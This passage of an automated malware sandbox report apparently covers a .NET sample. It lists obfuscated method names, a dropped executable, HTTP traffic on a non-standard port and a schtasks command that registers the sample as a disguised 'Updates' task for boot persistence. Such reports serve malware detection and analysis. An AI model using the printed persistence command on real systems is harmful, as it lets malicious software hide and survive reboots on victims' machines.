                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, t68jHSoYAIlawlIG5e.csHigh entropy of concatenated method names: 'FM3ycftrZB', 'zv3yrdALNI', 'vA7yPmJdO6', 'zxOynilvSC', 'srjyxmOARk', 'pSQyvGSvVr', 'zV8yhJZTEg', 'tyHyo6jVAX', 'xMNyVHYiNd', 'hyUyleXIRC'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, NkeBeUMWOPbsUVWFGR.csHigh entropy of concatenated method names: 'pYLhZxyrCT', 'F1DhBWJVN2', 'WHlhFonTAX', 'DXHhLA3Vj8', 'BDNhQxuHwm', 'qrshHU0t5w', 'DMPhO1sdGe', 'YEdhKvnu9v', 'l4HhAIbc6I', 'sAqhqhBjH3'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, jZRAJKPAeaJ6Pt9qQq.csHigh entropy of concatenated method names: 'Dispose', 'tvgIY85Y4O', 'nvj3b5KVtZ', 'hNPffntPlB', 'D8kIJMy1vk', 'SPWIzUGFNA', 'ProcessDialogKey', 'iAh3NDtyHO', 'ayb3IMnytg', 'KXw33tdlvm'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, Hqvnrc30jYf7S8Ttkb.csHigh entropy of concatenated method names: 'z5rFUlrvy', 'eIbLOQ0YJ', 'cDKH7AFCb', 'ewdOw2dpK', 'WUXAnKwc7', 'IpXqLv4b0', 'Wnc1062Cy8XRtCyXdo', 'e36OFMfFtyInfeOhhS', 'LBm9VG5s4', 'FxtGKXCpD'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, SKqjlyegPhm1gxVV2P.csHigh entropy of concatenated method names: 'acDhrA0HkB', 'pGVhnixgQi', 'PWhhvQx22Q', 'FpmvJe4F7k', 'RtUvzShxPN', 'EyhhNksjTR', 'qtLhInpjEH', 'Gu0h3uOX4r', 'J3khy6UovJ', 'WMqh0qCOQV'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, vkMy1vdkiPWUGFNAxA.csHigh entropy of concatenated method names: 'lR29r6KDv4', 'wAS9PeZ22f', 'asR9nm8Fgx', 'CtH9xSX5xE', 'wHp9vVfu0w', 'rZR9hwJgjS', 'LtQ9oyL5v2', 'cEd9Vwou42', 'WBK9lNgRTG', 'TmJ9wgHRMJ'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, oaDF8RAOREtcPdoorv.csHigh entropy of concatenated method names: 'dn4nLbevDm', 'foGnHqc1iH', 'VepnKA5ld4', 'zDtnAYpZmi', 'HoNnW470qt', 'p8CnkgSFui', 'GtVn5QrxR3', 'FKHn9sq3Le', 'LFOnXh1TKM', 'iYanGjR1Aw'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, do9ekiIyhQPeaTUkxHW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HY5GTjCsF2', 'W11G1YyBJm', 'OWCGinLynr', 'wLtG4Bx0cN', 'G9RGDDtyFT', 'Gx7GgCnVja', 'WTAGuuGyBc'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, aUOVGsjWasNXe67yVg.csHigh entropy of concatenated method names: 'o6dvctpC4C', 'UeUvPLufR0', 'jNbvxGoIlH', 'WnPvhKLS5c', 'oVevodEpIl', 'zFSxDF9reG', 'SZ0xgUej1A', 'NkZxuovhsi', 'tfnxd03UXp', 'gelxYw24DJ'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, tMZOjVtwNbMB4Vjyt6.csHigh entropy of concatenated method names: 'LJVSKDsqKg', 'm7PSAiri6o', 'LPVSjhdbyt', 'M6gSbgvQS6', 'hV6SCvFEpi', 'DuvSUbBmIp', 'UaYSeQvXeF', 'C5FS2nA76u', 'OSCSatlS6w', 'n6gSRHGXeA'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, GnMDJIINjyh8HxsYteN.csHigh entropy of concatenated method names: 'KtZXZsT4MD', 'xooXB4L5OA', 'rurXFlo4dk', 'E4bXL7J0EK', 'nfcXQF5YlK', 'xL6XH7Zm1x', 'rO0XOwODmt', 'tCwXKNbibj', 'sNIXA2MPaN', 'O4cXq4taXP'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, QdlvmkJkjt9a0OwbEb.csHigh entropy of concatenated method names: 'otvXILvGrG', 'MWaXyQyYpF', 'Df2X0FoeqZ', 'eEtXrjl0Sy', 'e9nXP8swGq', 'gyXXx8vtrX', 'tfnXvGwCfZ', 'upl9uW4BHC', 'mnp9da0vMS', 'MAe9Yt0GvE'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, jDtyHOYNybMnytgpXw.csHigh entropy of concatenated method names: 'mAo9jdOPUS', 'UEI9bfyXx2', 'jq79s39eW2', 'Y9s9Cxx7ug', 'OWE9Toay9p', 'SHG9Uw9MHN', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, FccI31gZs7ax4EMgc0.csHigh entropy of concatenated method names: 'Oa45d83JrX', 'dpL5JrHnyv', 'Bay9NSA4SR', 'KZZ9I6m8kE', 'Ufx5RO0WRn', 'bLu5fglnuo', 'QoQ5tIE2NR', 'vpI5Tm1oH5', 'LeG51aFNLK', 'swM5iw6g3W'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, FxZFjs4i7RkqaYNM30.csHigh entropy of concatenated method names: 'b0P5lCSL7w', 'QpS5wWvKwW', 'ToString', 'HdJ5r5OMqk', 'ELN5PeX7mp', 'ycn5n82U5Z', 'uxP5xQE8p3', 'vkk5vE8NhS', 'mV25hvXlUT', 'A205oClo1K'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, MIiEfhqr0fJrKWYxGY.csHigh entropy of concatenated method names: 'TNoxQi2nOb', 'jeZxOcjTHS', 'H1vnsyN905', 'tS8nCe0ISB', 'px6nUcP64f', 'tdXnpXdXmK', 'phlneLsGvn', 'hUcn2hM7tb', 'CysnMiJlsZ', 'yNpnaQTaAq'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, pmdfqZ0lSDhZhFlc0M.csHigh entropy of concatenated method names: 'zE7Ihr1DF7', 'HLsIoBO0ea', 'OORIlEtcPd', 'korIwv2IiE', 'oYxIWGYNUO', 'kGsIkWasNX', 'F84FEFzO4fZnljW9oJ', 'yTgFkSBG5aWYGtj61eV', 'eBUIIbg9SB', 'xPfIycBRVE'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, vr1DF7KsLsBO0eaics.csHigh entropy of concatenated method names: 'shAPT9VtDx', 'AgTP1O1NSf', 'IWNPiEYKGQ', 'vTHP4KqRgx', 'i6yPDqNhNh', 'x7IPgILM96', 't1dPurCFAT', 'oCEPdKrgpa', 'PnBPYRnjHR', 'mAYPJFMqjG'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, CvKhNyIIACZkd5dr9KT.csHigh entropy of concatenated method names: 'ToString', 'fblGy7tZx8', 'VS9G0LpQoq', 'DJkGcOMQDk', 'HL4GrJLjQS', 'e9oGP5xsgt', 'YWQGnJ3TXa', 'OA3Gxrv8TJ', 'EpDoHMC4chfe6HW9WN7', 'Odu5wlCW5CakG00voIl'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, RCrC1iTb0BmAV5dmVp.csHigh entropy of concatenated method names: 'qavWa0ZGrV', 'IedWfTHK9j', 'ev1WTqMmWF', 'r6YW1QEb7o', 'M55WbC08Rn', 'zNTWsvwhVY', 'xjkWCO6OkJ', 'LhmWUuJi2h', 'sxDWpgU1tg', 'EthWeCkQ9A'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, t68jHSoYAIlawlIG5e.csHigh entropy of concatenated method names: 'FM3ycftrZB', 'zv3yrdALNI', 'vA7yPmJdO6', 'zxOynilvSC', 'srjyxmOARk', 'pSQyvGSvVr', 'zV8yhJZTEg', 'tyHyo6jVAX', 'xMNyVHYiNd', 'hyUyleXIRC'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, NkeBeUMWOPbsUVWFGR.csHigh entropy of concatenated method names: 'pYLhZxyrCT', 'F1DhBWJVN2', 'WHlhFonTAX', 'DXHhLA3Vj8', 'BDNhQxuHwm', 'qrshHU0t5w', 'DMPhO1sdGe', 'YEdhKvnu9v', 'l4HhAIbc6I', 'sAqhqhBjH3'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, jZRAJKPAeaJ6Pt9qQq.csHigh entropy of concatenated method names: 'Dispose', 'tvgIY85Y4O', 'nvj3b5KVtZ', 'hNPffntPlB', 'D8kIJMy1vk', 'SPWIzUGFNA', 'ProcessDialogKey', 'iAh3NDtyHO', 'ayb3IMnytg', 'KXw33tdlvm'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, Hqvnrc30jYf7S8Ttkb.csHigh entropy of concatenated method names: 'z5rFUlrvy', 'eIbLOQ0YJ', 'cDKH7AFCb', 'ewdOw2dpK', 'WUXAnKwc7', 'IpXqLv4b0', 'Wnc1062Cy8XRtCyXdo', 'e36OFMfFtyInfeOhhS', 'LBm9VG5s4', 'FxtGKXCpD'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, SKqjlyegPhm1gxVV2P.csHigh entropy of concatenated method names: 'acDhrA0HkB', 'pGVhnixgQi', 'PWhhvQx22Q', 'FpmvJe4F7k', 'RtUvzShxPN', 'EyhhNksjTR', 'qtLhInpjEH', 'Gu0h3uOX4r', 'J3khy6UovJ', 'WMqh0qCOQV'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, vkMy1vdkiPWUGFNAxA.csHigh entropy of concatenated method names: 'lR29r6KDv4', 'wAS9PeZ22f', 'asR9nm8Fgx', 'CtH9xSX5xE', 'wHp9vVfu0w', 'rZR9hwJgjS', 'LtQ9oyL5v2', 'cEd9Vwou42', 'WBK9lNgRTG', 'TmJ9wgHRMJ'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, oaDF8RAOREtcPdoorv.csHigh entropy of concatenated method names: 'dn4nLbevDm', 'foGnHqc1iH', 'VepnKA5ld4', 'zDtnAYpZmi', 'HoNnW470qt', 'p8CnkgSFui', 'GtVn5QrxR3', 'FKHn9sq3Le', 'LFOnXh1TKM', 'iYanGjR1Aw'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, do9ekiIyhQPeaTUkxHW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HY5GTjCsF2', 'W11G1YyBJm', 'OWCGinLynr', 'wLtG4Bx0cN', 'G9RGDDtyFT', 'Gx7GgCnVja', 'WTAGuuGyBc'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, aUOVGsjWasNXe67yVg.csHigh entropy of concatenated method names: 'o6dvctpC4C', 'UeUvPLufR0', 'jNbvxGoIlH', 'WnPvhKLS5c', 'oVevodEpIl', 'zFSxDF9reG', 'SZ0xgUej1A', 'NkZxuovhsi', 'tfnxd03UXp', 'gelxYw24DJ'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, tMZOjVtwNbMB4Vjyt6.csHigh entropy of concatenated method names: 'LJVSKDsqKg', 'm7PSAiri6o', 'LPVSjhdbyt', 'M6gSbgvQS6', 'hV6SCvFEpi', 'DuvSUbBmIp', 'UaYSeQvXeF', 'C5FS2nA76u', 'OSCSatlS6w', 'n6gSRHGXeA'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, GnMDJIINjyh8HxsYteN.csHigh entropy of concatenated method names: 'KtZXZsT4MD', 'xooXB4L5OA', 'rurXFlo4dk', 'E4bXL7J0EK', 'nfcXQF5YlK', 'xL6XH7Zm1x', 'rO0XOwODmt', 'tCwXKNbibj', 'sNIXA2MPaN', 'O4cXq4taXP'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, QdlvmkJkjt9a0OwbEb.csHigh entropy of concatenated method names: 'otvXILvGrG', 'MWaXyQyYpF', 'Df2X0FoeqZ', 'eEtXrjl0Sy', 'e9nXP8swGq', 'gyXXx8vtrX', 'tfnXvGwCfZ', 'upl9uW4BHC', 'mnp9da0vMS', 'MAe9Yt0GvE'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, jDtyHOYNybMnytgpXw.csHigh entropy of concatenated method names: 'mAo9jdOPUS', 'UEI9bfyXx2', 'jq79s39eW2', 'Y9s9Cxx7ug', 'OWE9Toay9p', 'SHG9Uw9MHN', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, FccI31gZs7ax4EMgc0.csHigh entropy of concatenated method names: 'Oa45d83JrX', 'dpL5JrHnyv', 'Bay9NSA4SR', 'KZZ9I6m8kE', 'Ufx5RO0WRn', 'bLu5fglnuo', 'QoQ5tIE2NR', 'vpI5Tm1oH5', 'LeG51aFNLK', 'swM5iw6g3W'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, FxZFjs4i7RkqaYNM30.csHigh entropy of concatenated method names: 'b0P5lCSL7w', 'QpS5wWvKwW', 'ToString', 'HdJ5r5OMqk', 'ELN5PeX7mp', 'ycn5n82U5Z', 'uxP5xQE8p3', 'vkk5vE8NhS', 'mV25hvXlUT', 'A205oClo1K'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, MIiEfhqr0fJrKWYxGY.csHigh entropy of concatenated method names: 'TNoxQi2nOb', 'jeZxOcjTHS', 'H1vnsyN905', 'tS8nCe0ISB', 'px6nUcP64f', 'tdXnpXdXmK', 'phlneLsGvn', 'hUcn2hM7tb', 'CysnMiJlsZ', 'yNpnaQTaAq'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, pmdfqZ0lSDhZhFlc0M.csHigh entropy of concatenated method names: 'zE7Ihr1DF7', 'HLsIoBO0ea', 'OORIlEtcPd', 'korIwv2IiE', 'oYxIWGYNUO', 'kGsIkWasNX', 'F84FEFzO4fZnljW9oJ', 'yTgFkSBG5aWYGtj61eV', 'eBUIIbg9SB', 'xPfIycBRVE'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, vr1DF7KsLsBO0eaics.csHigh entropy of concatenated method names: 'shAPT9VtDx', 'AgTP1O1NSf', 'IWNPiEYKGQ', 'vTHP4KqRgx', 'i6yPDqNhNh', 'x7IPgILM96', 't1dPurCFAT', 'oCEPdKrgpa', 'PnBPYRnjHR', 'mAYPJFMqjG'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, CvKhNyIIACZkd5dr9KT.csHigh entropy of concatenated method names: 'ToString', 'fblGy7tZx8', 'VS9G0LpQoq', 'DJkGcOMQDk', 'HL4GrJLjQS', 'e9oGP5xsgt', 'YWQGnJ3TXa', 'OA3Gxrv8TJ', 'EpDoHMC4chfe6HW9WN7', 'Odu5wlCW5CakG00voIl'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, RCrC1iTb0BmAV5dmVp.csHigh entropy of concatenated method names: 'qavWa0ZGrV', 'IedWfTHK9j', 'ev1WTqMmWF', 'r6YW1QEb7o', 'M55WbC08Rn', 'zNTWsvwhVY', 'xjkWCO6OkJ', 'LhmWUuJi2h', 'sxDWpgU1tg', 'EthWeCkQ9A'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, t68jHSoYAIlawlIG5e.csHigh entropy of concatenated method names: 'FM3ycftrZB', 'zv3yrdALNI', 'vA7yPmJdO6', 'zxOynilvSC', 'srjyxmOARk', 'pSQyvGSvVr', 'zV8yhJZTEg', 'tyHyo6jVAX', 'xMNyVHYiNd', 'hyUyleXIRC'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, NkeBeUMWOPbsUVWFGR.csHigh entropy of concatenated method names: 'pYLhZxyrCT', 'F1DhBWJVN2', 'WHlhFonTAX', 'DXHhLA3Vj8', 'BDNhQxuHwm', 'qrshHU0t5w', 'DMPhO1sdGe', 'YEdhKvnu9v', 'l4HhAIbc6I', 'sAqhqhBjH3'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, jZRAJKPAeaJ6Pt9qQq.csHigh entropy of concatenated method names: 'Dispose', 'tvgIY85Y4O', 'nvj3b5KVtZ', 'hNPffntPlB', 'D8kIJMy1vk', 'SPWIzUGFNA', 'ProcessDialogKey', 'iAh3NDtyHO', 'ayb3IMnytg', 'KXw33tdlvm'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, Hqvnrc30jYf7S8Ttkb.csHigh entropy of concatenated method names: 'z5rFUlrvy', 'eIbLOQ0YJ', 'cDKH7AFCb', 'ewdOw2dpK', 'WUXAnKwc7', 'IpXqLv4b0', 'Wnc1062Cy8XRtCyXdo', 'e36OFMfFtyInfeOhhS', 'LBm9VG5s4', 'FxtGKXCpD'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, SKqjlyegPhm1gxVV2P.csHigh entropy of concatenated method names: 'acDhrA0HkB', 'pGVhnixgQi', 'PWhhvQx22Q', 'FpmvJe4F7k', 'RtUvzShxPN', 'EyhhNksjTR', 'qtLhInpjEH', 'Gu0h3uOX4r', 'J3khy6UovJ', 'WMqh0qCOQV'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, vkMy1vdkiPWUGFNAxA.csHigh entropy of concatenated method names: 'lR29r6KDv4', 'wAS9PeZ22f', 'asR9nm8Fgx', 'CtH9xSX5xE', 'wHp9vVfu0w', 'rZR9hwJgjS', 'LtQ9oyL5v2', 'cEd9Vwou42', 'WBK9lNgRTG', 'TmJ9wgHRMJ'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, oaDF8RAOREtcPdoorv.csHigh entropy of concatenated method names: 'dn4nLbevDm', 'foGnHqc1iH', 'VepnKA5ld4', 'zDtnAYpZmi', 'HoNnW470qt', 'p8CnkgSFui', 'GtVn5QrxR3', 'FKHn9sq3Le', 'LFOnXh1TKM', 'iYanGjR1Aw'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, do9ekiIyhQPeaTUkxHW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HY5GTjCsF2', 'W11G1YyBJm', 'OWCGinLynr', 'wLtG4Bx0cN', 'G9RGDDtyFT', 'Gx7GgCnVja', 'WTAGuuGyBc'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, aUOVGsjWasNXe67yVg.csHigh entropy of concatenated method names: 'o6dvctpC4C', 'UeUvPLufR0', 'jNbvxGoIlH', 'WnPvhKLS5c', 'oVevodEpIl', 'zFSxDF9reG', 'SZ0xgUej1A', 'NkZxuovhsi', 'tfnxd03UXp', 'gelxYw24DJ'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, tMZOjVtwNbMB4Vjyt6.csHigh entropy of concatenated method names: 'LJVSKDsqKg', 'm7PSAiri6o', 'LPVSjhdbyt', 'M6gSbgvQS6', 'hV6SCvFEpi', 'DuvSUbBmIp', 'UaYSeQvXeF', 'C5FS2nA76u', 'OSCSatlS6w', 'n6gSRHGXeA'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, GnMDJIINjyh8HxsYteN.csHigh entropy of concatenated method names: 'KtZXZsT4MD', 'xooXB4L5OA', 'rurXFlo4dk', 'E4bXL7J0EK', 'nfcXQF5YlK', 'xL6XH7Zm1x', 'rO0XOwODmt', 'tCwXKNbibj', 'sNIXA2MPaN', 'O4cXq4taXP'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, QdlvmkJkjt9a0OwbEb.csHigh entropy of concatenated method names: 'otvXILvGrG', 'MWaXyQyYpF', 'Df2X0FoeqZ', 'eEtXrjl0Sy', 'e9nXP8swGq', 'gyXXx8vtrX', 'tfnXvGwCfZ', 'upl9uW4BHC', 'mnp9da0vMS', 'MAe9Yt0GvE'
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, jDtyHOYNybMnytgpXw.csHigh entropy of concatenated method names: 'mAo9jdOPUS', 'UEI9bfyXx2', 'jq79s39eW2', 'Y9s9Cxx7ug', 'OWE9Toay9p', 'SHG9Uw9MHN', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile created: C:\Users\user\AppData\Roaming\TmfmVKU.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49744
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
